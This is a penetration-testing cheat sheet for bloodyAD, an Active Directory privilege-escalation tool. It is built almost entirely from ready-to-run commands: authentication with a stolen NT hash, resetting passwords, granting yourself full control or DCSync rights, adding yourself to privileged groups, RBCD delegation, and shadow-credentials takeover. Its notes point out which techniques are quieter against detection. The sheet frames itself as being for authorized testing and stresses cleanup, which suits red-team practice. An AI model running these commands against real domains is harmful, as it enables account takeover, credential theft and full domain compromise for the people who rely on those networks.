โ† All cheat sheets

BLOODYAD

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

bloodyAD is a Python AD privilege-escalation framework that manipulates
directory objects via LDAP (and LDAPS). It reads and WRITES AD objects
to exploit ACL/DACL misconfigurations discovered by BloodHound - reset
passwords, add group members, set delegation, and more. Authorized only.

CONNECTION#

bloodyAD --host <dc> -d corp.lu -u user -p 'Pass' <action>
bloodyAD --host <dc> -d corp.lu -u user -p ':<nthash>' <action>   # PtH
bloodyAD --host <dc> -d corp.lu -k <action>                       # Kerberos
bloodyAD --host <dc> -d corp.lu -u user -p 'Pass' \
  --secure <action>                                                # LDAPS

ENUMERATION (GET)#

bloodyAD ... get object <target>                # Read an object's attrs
bloodyAD ... get children                        # List child objects
bloodyAD ... get writable                        # Objects YOU can write
bloodyAD ... get writable --detail               # With permissions
bloodyAD ... get membership <user>               # Group memberships
bloodyAD ... get search --filter '(objectClass=user)'
bloodyAD ... get dnsDump                          # Dump AD-integrated DNS

# 'get writable' is the key recon: it shows exactly which escalation
# primitives below are actually available to your identity

PASSWORD & ACCOUNT (SET)#

bloodyAD ... set password <target> 'NewPass1!'  # Reset a user's password
bloodyAD ... set owner <target> <you>            # Take object ownership
bloodyAD ... add genericAll <target> <you>       # Grant yourself full ctrl
bloodyAD ... remove genericAll <target> <you>    # Clean up afterward

GROUP MEMBERSHIP#

bloodyAD ... add groupMember <group> <user>      # Add to group
bloodyAD ... remove groupMember <group> <user>   # Remove (cleanup)
# e.g. add yourself to a privileged group you have write over

DELEGATION / RBCD#

bloodyAD ... add rbcd <target-computer> <attacker-computer>
                                                 # Configure RBCD
bloodyAD ... add computer ATTACKER 'CompPass1!'  # Create a computer acct
bloodyAD ... remove rbcd <target> <attacker>     # Cleanup
# Then use impacket getST (S4U) to impersonate -> access target

DCSYNC RIGHTS / SHADOW CREDS#

bloodyAD ... add dcsync <user>                   # Grant DCSync to a user
bloodyAD ... remove dcsync <user>                # Revoke (cleanup)
bloodyAD ... add shadowCredentials <target>      # Key Credential (PKINIT)
bloodyAD ... remove shadowCredentials <target>   # Cleanup
# shadowCredentials -> obtain a cert/TGT for the target without pw reset

UAC / ATTRIBUTES#

bloodyAD ... add uac <target> -f DONT_REQ_PREAUTH # Enable AS-REP roast
bloodyAD ... remove uac <target> -f DONT_REQ_PREAUTH
bloodyAD ... set object <target> <attr> -v <value>

EXAMPLES#

# Find what you can write, then escalate via the available primitive
bloodyAD --host dc -d corp.lu -u user -p 'Pass' get writable --detail

# Add yourself to a privileged group you have write access over
bloodyAD --host dc -d corp.lu -u user -p 'Pass' \
  add groupMember 'Helpdesk Admins' user

# Shadow Credentials takeover of a target (no password reset needed)
bloodyAD --host dc -d corp.lu -u user -p 'Pass' \
  add shadowCredentials svc_admin

# Grant DCSync, replicate, then revoke (via impacket secretsdump)
bloodyAD --host dc -d corp.lu -u user -p 'Pass' add dcsync user

NOTES#

- Workflow: BloodHound finds the ACL path -> bloodyAD executes it over
  LDAP (you already have BLOODHOUND for the graph)
- Always run 'get writable' first - it tells you which actions succeed
- shadowCredentials and rbcd are quieter than password resets and are
  password-reset resistant persistence-adjacent primitives
- CLEAN UP: every add has a matching remove - reverse changes and log
  them for the engagement report
- LDAP signing/channel binding do not block authenticated writes, but
  detection watches for anomalous ACL/attribute changes (4662/5136)
- Exact subcommand names vary by version - run 'bloodyAD -h' to confirm
- Pairs with LDAP-ENUM, ADCS-ATTACKS, KERBEROASTING sheets